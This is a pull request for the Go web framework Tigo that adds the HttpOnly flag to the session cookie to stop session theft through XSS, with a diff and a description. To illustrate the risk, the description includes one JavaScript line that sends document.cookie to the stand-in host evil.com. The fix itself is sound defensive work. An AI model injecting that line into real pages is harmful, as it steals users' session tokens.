### PR TITLE
fix: add HttpOnly flag to session cookie to prevent XSS-based session theft

### DIFF
--- a/web/handler.go
+++ b/web/handler.go
@@ -491,7 +491,7 @@ func (baseHandler *BaseHandler) SetSession(key string, value interface{}) (err e
 			sessionId = session.SessionId()
 		}
 	}
-	baseHandler.SetAdvancedCookie(SessionCookieName, sessionId, "path=/")
+	baseHandler.SetAdvancedCookie(SessionCookieName, sessionId, "path=/", "httpOnly=true")
 	err = session.Set(key, value)
 	return
 }


### PR DESCRIPTION
## Summary

Add `HttpOnly` flag to the session cookie set by `SetSession` in `web/handler.go` to prevent XSS-based session theft.

## Problem

`SetSession` sets the session cookie via:
```go
baseHandler.SetAdvancedCookie(SessionCookieName, sessionId, "path=/")
```

This creates a cookie **without** the `HttpOnly` flag, meaning JavaScript running in the browser can read the session ID via `document.cookie`. If an application built with Tigo has any XSS vulnerability, an attacker can steal session tokens with:

```javascript
new Image().src = "https://evil.com/steal?c=" + document.cookie;
```

## Fix

Add `"httpOnly=true"` to the `SetAdvancedCookie` call in `SetSession`:

```go
baseHandler.SetAdvancedCookie(SessionCookieName, sessionId, "path=/", "httpOnly=true")
```

This sets the `HttpOnly` attribute on the session cookie, preventing JavaScript from accessing it. The cookie remains fully functional for server-side session management — only client-side script access is blocked.

## Impact

- **Type**: Session Hijacking via XSS (CWE-1004: Sensitive Cookie Without HttpOnly Flag)
- **Affected function**: `web.BaseHandler.SetSession`
- **Risk**: Any XSS in an application using Tigo's session management allows session theft
- **OWASP**: A05:2021 — Security Misconfiguration